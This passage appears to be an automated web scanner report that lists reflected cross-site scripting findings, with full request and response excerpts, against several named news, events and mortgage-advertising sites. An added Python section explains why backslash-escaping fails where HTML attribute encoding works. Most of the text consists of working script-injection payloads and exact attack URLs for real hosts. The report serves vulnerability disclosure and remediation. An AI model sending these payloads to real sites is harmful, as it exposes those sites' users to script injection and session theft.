Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?94f3e"><script>alert(1)</script>ceef51fea12=1" />
...[SNIP]...
1.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /restaurants
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ab"><script>alert(1)</script>f73c13b2255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into the HTML document as plain text between tags. The payload 7c80e<script>alert(1)</script>e0b48eab0cb was submitted in the st_select parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event7c80e<script>alert(1)</script>e0b48eab0cb&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f25f"><script>alert(1)</script>de56addb30 was submitted in the st_select parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event1f25f"><script>alert(1)</script>de56addb30&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d737d'%3balert(1)//cee44e0808f was submitted in the st_select parameter. This input was echoed as d737d';alert(1)//cee44e0808f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=eventd737d'%3balert(1)//cee44e0808f&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744e1"%3balert(1)//1e62870ad6d was submitted in the st_select parameter. This input was echoed as 744e1";alert(1)//1e62870ad6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event744e1"%3balert(1)//1e62870ad6d&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the svt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66943"><script>alert(1)</script>2a358999d52 was submitted in the svt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text66943"><script>alert(1)</script>2a358999d52&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the swhat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd510</script><a%20b%3dc>535a6ed6f38 was submitted in the swhat parameter. This input was echoed as bd510</script><a b=c>535a6ed6f38 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11bd510</script><a%20b%3dc>535a6ed6f38&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the swhat request parameter is copied into the HTML document as plain text between tags. The payload 36469<a%20b%3dc>2719cbb6ab was submitted in the swhat parameter. This input was echoed as 36469<a b=c>2719cbb6ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /search?swhat=superbowl1136469<a%20b%3dc>2719cbb6ab&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
&new=n&search=true&srad=30&srss=&st=any&st_select=event&svt=text&swhat=superbowl1136469%3Ca+b%3Dc%3E2719cbb6ab&swhen=&swhere=Irvine%2CCA">Search for "superbowl1136469<a b=c>2719cbb6ab" in all products</a>
...[SNIP]...
The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload 85df0<script>alert(1)</script>404a1997572 was submitted in the swhen parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?swhat=superbowl11&swhen=85df0<script>alert(1)</script>404a1997572&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message"> Unrecognized date format: 85df0<script>alert(1)</script>404a1997572 is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...
The value of the swhere request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a218c"%3balert(1)//25febe7845a was submitted in the swhere parameter. This input was echoed as a218c";alert(1)//25febe7845a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCAa218c"%3balert(1)//25febe7845a&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
1.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49e9d"><script>alert(1)</script>a5e0ca94175 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?49e9d"><script>alert(1)</script>a5e0ca94175=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/venues?49e9d"><script>alert(1)</script>a5e0ca94175=1" />
...[SNIP]...
1.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.orangecounty.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc4c"><script>alert(1)</script>b1440f97378 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?fcc4c"><script>alert(1)</script>b1440f97378=1 HTTP/1.1
Host: events.orangecounty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c0a2"><script>alert(1)</script>02b7ab40d5d was submitted in the REST URL parameter 5. This input was echoed as 1c0a2\"><script>alert(1)</script>02b7ab40d5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2"><script>alert(1)</script>02b7ab40d5d/ HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:52 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ication/rss+xml" title=" Page not found - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/865141c0a2\"><script>alert(1)</script>02b7ab40d5d/feed/" />
...[SNIP]...
1.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef48"><script>alert(1)</script>95bfb7dccc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ef48\"><script>alert(1)</script>95bfb7dccc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48"><script>alert(1)</script>95bfb7dccc8=1 HTTP/1.1
Host: fastfood.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://fastfood.ocregister.com/xmlrpc.php
Link: <http://fastfood.ocregister.com/?p=86514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... of eco-friendly, food delivery bikes - Fast Food Maven - www.ocregister.com" href="http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/?3ef48\"><script>alert(1)</script>95bfb7dccc8=1feed/" /> ...[SNIP]...
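What the backslash does and does not achieve, as an added example that is not part of the report: the scanner's canary from the first fastfood.ocregister.com finding is rendered into a double-quoted href attribute in two ways, first through a PHP-style addslashes() transformation (an assumption about what produced the \" in the echoed output; the report does not say what the application did) and then through proper HTML attribute encoding, and Python's standard-library HTML tokenizer is used to see whether a script element results. The <link> template, the example.invalid host and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# The scanner's canary for the first fastfood.ocregister.com finding (from the report).
CANARY = '1c0a2"><script>alert(1)</script>02b7ab40d5d'


def addslashes(s):
    """PHP-style addslashes(). Assumption: the report's echoed value
    (1c0a2\\"><script>...) is consistent with this transformation; the page
    itself does not say what produced the backslash."""
    return s.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")


def render_feed_link(value):
    """Hypothetical template for the <link> element seen in the response: the
    reflected value lands inside a double-quoted href attribute."""
    return ('<link rel="alternate" type="application/rss+xml" '
            'href="http://example.invalid/2011/02/03/post/' + value + '/feed/" />')


class TagCollector(HTMLParser):
    """Records every start tag and the href of the <link> element, as an HTML
    tokenizer sees them. Quoted attribute values end at the next matching
    quote; HTML has no escape character, so a backslash is just data."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.link_href = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == 'link':
            self.link_href = dict(attrs).get('href')


def tokenize(markup):
    """Return (list of start tags, href of the <link> element) for the markup."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.link_href


def script_element_created(markup):
    """True if the reflected value escaped the attribute and produced a real
    <script> element, i.e. the PoC would fire on page load."""
    return 'script' in tokenize(markup)[0]


def echo_with_addslashes(value):
    """The ineffective defence: backslash before the quote, nothing else."""
    return render_feed_link(addslashes(value))


def echo_with_html_escape(value):
    """The correct defence for a quoted attribute: " -> &quot;, < > & -> entities."""
    return render_feed_link(html.escape(value, quote=True))
```

Only the html.escape() version keeps the canary inside the attribute; the addslashes() variant tokenizes as a <link> element followed by a real <script> element, which is what the response fragment above shows. The tokenizer is a model rather than a browser, but the rule it implements (a quoted attribute value ends at the next matching quote, with no escaping) is the one browsers follow, so the result transfers.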
1.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gsbmtg.rtrk.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 328ed"><script>alert(1)</script>27d26f5a006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?scid=1794971&328ed"><script>alert(1)</script>27d26f5a006=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:14 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308111464447; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR", policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:06 GMT;path=/;httponly
Content-Length: 2952
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d57"><script>alert(1)</script>3b3d1a7631b was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
<title>GSB Mortgage, Inc. (Grapevine ...[SNIP]... <a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=69682947d57"><script>alert(1)</script>3b3d1a7631b&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn"> ...[SNIP]...
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfc43'><script>alert(1)</script>24de61d88b7 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:37 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:29 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2239'><script>alert(1)</script>f71a112c65e was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367c8"><script>alert(1)</script>5ab130b97d9 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461
<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML> <HEAD>
